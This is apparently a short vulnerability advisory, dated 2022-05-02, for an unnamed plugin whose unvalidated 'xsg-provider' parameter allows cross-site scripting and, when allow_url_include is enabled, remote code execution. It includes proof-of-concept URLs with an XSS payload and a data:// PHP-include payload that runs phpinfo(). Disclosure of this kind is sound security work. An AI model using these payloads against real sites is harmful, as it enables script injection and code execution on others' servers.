The plugin does not validate a parameter which can be set to an arbitrary value, thus causing XSS via error message or RCE if allow_url_include is turned on.
XSS: https://example.com/?p=1&xsg-provider=%3Cimg%20src%20onerror=alert(1)%3E&xsg-format=yyy&xsg-type=zz&xsg-page=pp RCE (when allow_url_include is on): https://example.com/?p=1&xsg-provider=data://text/html,%3C?php%20phpinfo();%20//&xsg-format=yyy&xsg-type=zz&xsg-page=pp
Krzysztof Zając
Krzysztof Zając
Yes
2022-05-02 (about 1 years ago)
2022-05-02 (about 1 years ago)
2022-05-02 (about 1 years ago)